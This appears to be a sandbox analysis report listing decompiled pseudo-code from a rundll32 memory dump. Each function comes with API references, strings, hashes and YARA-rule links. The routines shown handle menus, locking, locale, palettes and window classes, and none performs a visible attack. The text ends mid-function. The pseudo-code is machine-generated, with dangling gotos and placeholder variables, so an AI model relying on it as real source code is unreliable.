			E00E354FC(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00E13244(1);
				_push(_t77);
				_push(0xe35583);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0xe25420; // 0xe2546c
				 *((intOrPtr*)(_v12 + 0x6c)) = E00E13424(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0xe7f8b0);
				L00E16368();
				_push(_t77);
				_push(0xe355e3);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00E33F84( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00E33F80(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(0xe355ea);
				_push(0xe7f8b0);
				L00E164A8();
				return 0;
			}

0x00e354fd
0x00e354ff
0x00e35509
0x00e35518
0x00e3551d
0x00e3551e
0x00e35523
0x00e35526
0x00e3552c
0x00e35532
0x00e35545
0x00e35545
0x00e3554d
0x00e35557
0x00e35562
0x00e35562
0x00e35568
0x00e35576
0x00e3557b
0x00e3557e
0x00e3559a
0x00e3559f
0x00e355a6
0x00e355a7
0x00e355ac
0x00e355af
0x00e355b8
0x00e355c3
0x00e355c6
0x00e355cd
0x00e355d0
0x00e355d3
0x00e355d8
0x00e355dd
0x00e355e2

APIs

RtlEnterCriticalSection.KERNEL32(00E7F8B0), ref: 00E3559F
RtlLeaveCriticalSection.KERNEL32(00E7F8B0,00E355EA,00E7F8B0), ref: 00E355DD

Strings

lT, xrefs: 00E35568
d, xrefs: 00E3550E

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: d$lT
API String ID: 3168844106-387771148
Opcode ID: e87ae89e4ac2950edc42d9925dcba214ef6c17a4fdb4787d47029f49a4ec407d
Instruction ID: 2acf2802e6297883a7cce75653fccd84b17e9d5c65faf29322234ebb98269cf6
Opcode Fuzzy Hash: e87ae89e4ac2950edc42d9925dcba214ef6c17a4fdb4787d47029f49a4ec407d
Instruction Fuzzy Hash: 8E217A75A04748AFDB05DF68D881899BBF6FB48720F5291A5E804A7361C630AE80CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00E50494 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E50494(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0xe7e318; // 0xe7f744
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00E50818(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00E50818(_t29) & 0x0000007f) << 0x0000000d) + ((E00E50818(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x00e50496
0x00e50499
0x00e5049b
0x00e504a4
0x00e504bb
0x00e504bd
0x00e504c4
0x00e504d0
0x00e504d4
0x00e504e2
0x00e504e9
0x00e504ed
0x00e504ff
0x00e50504
0x00e50522
0x00e50526
0x00e50534
0x00e5053b
0x00000000
0x00e50541
0x00e5053b
0x00e50504
0x00e504e9
0x00e5054e

APIs

GetMenuItemInfoA.USER32 ref: 00E504E2
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00E50534
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00E50541

Strings

P, xrefs: 00E504D4

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: 4cb676cd0c71ecf94b9c07a6ecaec5c1249b2bdcf65021176732795045153d01
Instruction ID: c99a92d1a7756043ce60bfe43058570af22e0b2041636339eae225e06dbc7d5c
Opcode Fuzzy Hash: 4cb676cd0c71ecf94b9c07a6ecaec5c1249b2bdcf65021176732795045153d01
Instruction Fuzzy Hash: 37119E70605200AFD360DB28CD81B8B7BD5AF85365F149A68F498EB2D5E775C88CCB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E370E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00E370E0(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0xe7f91e != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0xe7f8fc; // 0xe370e0
					 *0xe7f8fc = E00E36F70(2, _t14, _t16, _t17, _t18);
					_t19 =  *0xe7f8fc(_t14, _t17);
				}
				return _t19;
			}

0x00e370e6
0x00e370e9
0x00e370f3
0x00e37118
0x00e37121
0x00e37148
0x00e37148
0x00e370f5
0x00e370fa
0x00e37107
0x00e37114
0x00e37114
0x00e37153

APIs

GetSystemMetrics.USER32 ref: 00E37131
GetSystemMetrics.USER32 ref: 00E3713D

Part of subcall function 00E36F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00E36FF0

Strings

p, xrefs: 00E370FA, 00E37107, 00E3710E
MonitorFromRect, xrefs: 00E370F5

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: MetricsSystem$AddressProc
String ID: MonitorFromRect$p
API String ID: 1792783759-2543796470
Opcode ID: 9306fca81c2115e0328f5fc48a655986e2f1f1984f0eff1ed2abe20a0da7a9b2
Instruction ID: 55b87634aa0a32f243bb7aa4cef7ec6696dc058c07661ae8b917b763c07f5a8e
Opcode Fuzzy Hash: 9306fca81c2115e0328f5fc48a655986e2f1f1984f0eff1ed2abe20a0da7a9b2
Instruction Fuzzy Hash: B701A272209214DFEB20CB15DC89B56BFE5D741399F15A062EA88FB202C370DDC4CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E1CECC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E1CECC() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0xe7c140 = _t1;
				}
				if( *0xe7c140 == 0) {
					 *0xe7c140 = E00E18914;
					return E00E18914;
				}
				return _t1;
			}

0x00e1ced2
0x00e1ced7
0x00e1cedb
0x00e1cee3
0x00e1cee8
0x00e1cee8
0x00e1cef4
0x00e1cefb
0x00000000
0x00e1cefb
0x00e1cf01

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00E1D935,00000000,00E1D948), ref: 00E1CED2
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 00E1CEE3

Strings

GetDiskFreeSpaceExA, xrefs: 00E1CEDD
kernel32.dll, xrefs: 00E1CECD

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: b280fd4cc4809b65f4de2450be29f1e130a047957f40584ef5ac047e4e0fa949
Instruction ID: 9c0573515a2d0772567b7a6130e22eebac92121dec0988ede6e75e9807831ee8
Opcode Fuzzy Hash: b280fd4cc4809b65f4de2450be29f1e130a047957f40584ef5ac047e4e0fa949
Instruction Fuzzy Hash: 43D09E707853115FDB10DBAA58816EA26EAA748758B603539E004F6152D76049D68661

Uniqueness

Uniqueness Score: -1.00%

Function 00E1EDAC Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00E1EDAC(intOrPtr* __eax) {
				char _v260;
				char _v768;
				char _v772;
				intOrPtr* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if(( *(_v776 + 1) & 0x00000020) == 0) {
					E00E1EBF4(0x80070057);
				}
				_t43 =  *_v776;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 =  *((intOrPtr*)(_v776 + 8));
					} else {
						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L00E1DE04();
							E00E1EBF4(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L00E1DE0C();
							E00E1EBF4(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E00E1ED50(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E00E1ED20(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L00E1DE14();
						E00E1EBF4(_v780);
						E00E1EFA4(_v792);
					}
				}
				L15:
				_push(_v776);
				L00E1D9A0();
				return E00E1EBF4(_v776);
			}

0x00e1edb8
0x00e1edc8
0x00e1edcf
0x00e1edcf
0x00e1edda
0x00e1ede8
0x00e1edf7
0x00e1ee15
0x00e1edf9
0x00e1ee04
0x00e1ee04
0x00e1ee24
0x00e1ee30
0x00e1ee33
0x00e1ee35
0x00e1ee36
0x00e1ee38
0x00e1ee3e
0x00e1ee40
0x00e1ee4f
0x00e1ee50
0x00e1ee5a
0x00e1ee5b
0x00e1ee60
0x00e1ee6b
0x00e1ee6c
0x00e1ee76
0x00e1ee77
0x00e1ee7c
0x00e1ee97
0x00e1ee99
0x00e1ee9a
0x00e1ee9d
0x00e1ee9d
0x00e1ee3e
0x00e1eea6
0x00e1eea9
0x00e1eeab
0x00e1eeac
0x00e1eeb2
0x00e1eeb8
0x00e1eeba
0x00e1eebc
0x00e1eebf
0x00e1eec2
0x00e1eec2
0x00e1eec5
0x00000000
0x00000000
0x00000000
0x00e1eec5
0x00e1eec5
0x00e1eecc
0x00e1eed7
0x00e1eedf
0x00e1eee6
0x00e1eeed
0x00e1eeee
0x00e1eef3
0x00e1eefe
0x00e1eefe
0x00e1ef0c
0x00e1ef10
0x00e1ef16
0x00e1ef17
0x00e1ef27

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00E1EE5B
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00E1EE77
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00E1EEEE
VariantClear.OLEAUT32(?), ref: 00E1EF17

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
Instruction ID: 59da2d95980800fa3231fd3e8305e8cd1e7a8b2290ecc31e96df7e7ba6836e3d
Opcode Fuzzy Hash: 7463b96e7709db7e7e57e6038e100b286abb4ae14a2a075b432a194abf0ddec3
Instruction Fuzzy Hash: D241E375A052299FCB62DB58CC91AC9B3FCAB48304F0051E5FA49B7312DA34AFC58F61

Uniqueness

Uniqueness Score: -1.00%

Function 00E1C8F0 Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E1C8F0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0xe7f744 = 0x409;
				 *0xe7f748 = 9;
				 *0xe7f74c = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0xe7f744 = _t14;
				}
				if(_t14 != 0) {
					 *0xe7f748 = _t14 & 0x3ff;
					 *0xe7f74c = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0xe7c11c, 0xe1ca44, 8 << 2);
				if( *0xe7c0d4 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0xe7f751 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0xe7f750 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E00E1C878(__eflags, _t49);
					}
				} else {
					_t20 = E00E1C8D8();
					if(_t20 != 0) {
						 *0xe7f751 = 0;
						 *0xe7f750 = 0;
						return _t20;
					}
					E00E1C878(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00E12DA4(0xe7c11c, 0x20, 0xe1ca44);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0xe7f750 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0xe7f751 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0xe7f744; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0xe7f751 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}

0x00e1c8fc
0x00e1c906
0x00e1c910
0x00e1c91a
0x00e1c921
0x00e1c923
0x00e1c923
0x00e1c92b
0x00e1c937
0x00e1c943
0x00e1c943
0x00e1c957
0x00e1c960
0x00e1ca0f
0x00e1ca14
0x00e1ca19
0x00e1ca20
0x00e1ca25
0x00e1ca27
0x00e1ca2a
0x00e1ca30
0x00e1ca32
0x00000000
0x00e1ca3a
0x00e1c966
0x00e1c966
0x00e1c96d
0x00e1c96f
0x00e1c976
0x00000000
0x00e1c976
0x00e1c983
0x00e1c993
0x00e1c995
0x00e1c99a
0x00e1c99d
0x00e1c9a3
0x00e1c9a5
0x00e1c9a7
0x00000000
0x00e1c9a7
0x00e1c9b3
0x00e1c9b8
0x00e1c9be
0x00e1c9be
0x00e1c9c0
0x00e1c9c1
0x00e1c9c2
0x00e1c9c2
0x00e1c9de
0x00e1c9e4
0x00e1c9e9
0x00e1c9ee
0x00e1c9f4
0x00e1c9f4
0x00e1c9f8
0x00e1c9fb
0x00e1ca01
0x00e1ca03
0x00000000
0x00000000
0x00e1ca05
0x00e1ca08
0x00e1ca08
0x00e1ca09
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00e1ca09
0x00e1c9f4
0x00e1ca41
0x00e1ca41
0x00000000

APIs

GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 00E1C9E4
GetThreadLocale.KERNEL32 ref: 00E1C91A

Part of subcall function 00E1C878: GetCPInfo.KERNEL32(00000000,?), ref: 00E1C891

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: ac8e5751133805fb27f1fc9376d07b54a3eee2d485c0ed95e275b5f3427e7ea8
Instruction ID: 1d9255b0c4c5b9458a2e8411a66018c4e82d29b924b89f7de2d6f055dc1137e4
Opcode Fuzzy Hash: ac8e5751133805fb27f1fc9376d07b54a3eee2d485c0ed95e275b5f3427e7ea8
Instruction Fuzzy Hash: 953189315D43888ED710C726AC027E537D8EB81306F646076E88CFB292EA7488CED361

Uniqueness

Uniqueness Score: -1.00%

Function 00E33E94 Relevance: 6.1, APIs: 4, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00E33E94(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				intOrPtr _t59;
				struct HDC__* _t69;
				void* _t70;
				intOrPtr _t79;
				void* _t84;
				struct HPALETTE__* _t85;
				intOrPtr _t87;
				intOrPtr _t89;

				_t87 = _t89;
				_push(_t70);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E00E30B08(_v8);
					_push(_t87);
					_push(0xe33f73);
					_push( *[fs:eax]);
					 *[fs:eax] = _t89;
					E00E3529C( *((intOrPtr*)(_v8 + 0x58)));
					E00E33D10( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					E00E3539C( *((intOrPtr*)(_v8 + 0x58)));
					_t69 = CreateCompatibleDC(0);
					_t84 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t84 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
					}
					_t85 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
					if(_t85 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
						RealizePalette(_t69);
					}
					E00E30DFC(_v8, _t69);
					_t59 =  *0xe7c6ec; // 0xf00acc
					E00E27360(_t59, _t69, _t70, _v8, _t85);
					_pop(_t79);
					 *[fs:eax] = _t79;
					_push(0xe33f7a);
					return E00E30C74(_v8);
				}
			}

0x00e33e95
0x00e33e97
0x00e33e9a
0x00e33e9d
0x00e33ea4
0x00e33f7e
0x00e33eaa
0x00e33ead
0x00e33eb4
0x00e33eb5
0x00e33eba
0x00e33ebd
0x00e33ec6
0x00e33ed7
0x00e33ee2
0x00e33eee
0x00e33ef9
0x00e33efe
0x00e33f14
0x00e33f00
0x00e33f0a
0x00e33f0a
0x00e33f20
0x00e33f25
0x00e33f43
0x00e33f27
0x00e33f33
0x00e33f37
0x00e33f37
0x00e33f4b
0x00e33f53
0x00e33f58
0x00e33f5f
0x00e33f62
0x00e33f65
0x00e33f72
0x00e33f72

APIs

Part of subcall function 00E30B08: RtlEnterCriticalSection.KERNEL32(00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B10
Part of subcall function 00E30B08: RtlLeaveCriticalSection.KERNEL32(00E7F8C8,00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B1D
Part of subcall function 00E30B08: RtlEnterCriticalSection.KERNEL32(00000038,00E7F8C8,00E7F8C8,00000000,00E2F5B6,00000000,00E2F615), ref: 00E30B26

Part of subcall function 00E3539C: GetDC.USER32(00000000), ref: 00E353F2
Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E35407
Part of subcall function 00E3539C: GetDeviceCaps.GDI32(00000000,0000000E), ref: 00E35411
Part of subcall function 00E3539C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00E33EE7,00000000,00E33F73), ref: 00E35435
Part of subcall function 00E3539C: ReleaseDC.USER32 ref: 00E35440

CreateCompatibleDC.GDI32(00000000), ref: 00E33EE9
SelectObject.GDI32(00000000,?), ref: 00E33F02
SelectPalette.GDI32(00000000,?,000000FF), ref: 00E33F2B
RealizePalette.GDI32(00000000), ref: 00E33F37

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
String ID:
API String ID: 979337279-0
Opcode ID: c01c23f62119850451a5c6d1e47b1fe66fad7619ebd59051d20ae6853e460b57
Instruction ID: 3ca486319556088df57c240f083ee49160025cd0e8bc114abf8f0c5334b19365
Opcode Fuzzy Hash: c01c23f62119850451a5c6d1e47b1fe66fad7619ebd59051d20ae6853e460b57
Instruction Fuzzy Hash: 1231F774A04658EFD704EF69C985D8EBBF5EF48720B6255A5F804AB322D730EE80DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00E50AEC Relevance: 6.1, APIs: 4, Instructions: 72
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E50AEC(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00E501F8(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E00E50074(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E00E50074(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00E18A44(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00E18988(_a12, _t49);
				}
			}

0x00e50af3
0x00e50af5
0x00e50af7
0x00e50b02
0x00000000
0x00e50b86
0x00e50b06
0x00e50b16
0x00e50b33
0x00e50b38
0x00e50b3d
0x00e50b4a
0x00e50b4a
0x00e50b18
0x00e50b1f
0x00e50b2c
0x00e50b2c
0x00e50b51
0x00000000
0x00e50b53
0x00e50b56
0x00e50b65
0x00000000
0x00e50b6d

APIs

GetMenuState.USER32 ref: 00E50B0F
GetSubMenu.USER32 ref: 00E50B1A
GetMenuItemID.USER32(?,?), ref: 00E50B33
GetMenuStringA.USER32(?,?,?,?,?), ref: 00E50B86

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Menu$ItemStateString
String ID:
API String ID: 306270399-0
Opcode ID: 43d8460374a5e68e0b4c43e8129ce4c9323bb60f161401557c61158e3e4aae79
Instruction ID: df122e1553949f3e3a6de7af44fc3ff45e4191c0ef7548a7fd198ff534531ce3
Opcode Fuzzy Hash: 43d8460374a5e68e0b4c43e8129ce4c9323bb60f161401557c61158e3e4aae79
Instruction Fuzzy Hash: CB118E31601218AF8B80EE2CCCC1EEF77E89F8A365B146929FC19EB351CA309D45D760

Uniqueness

Uniqueness Score: -1.00%

Function 00E2DDA4 Relevance: 6.1, APIs: 4, Instructions: 59
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00E2DDA4(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0xe7f668; // 0xe10000
				 *0xe7c41c = _t6;
				_t8 =  *0xe7c430; // 0xe2dd94
				_t9 =  *0xe7f668; // 0xe10000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
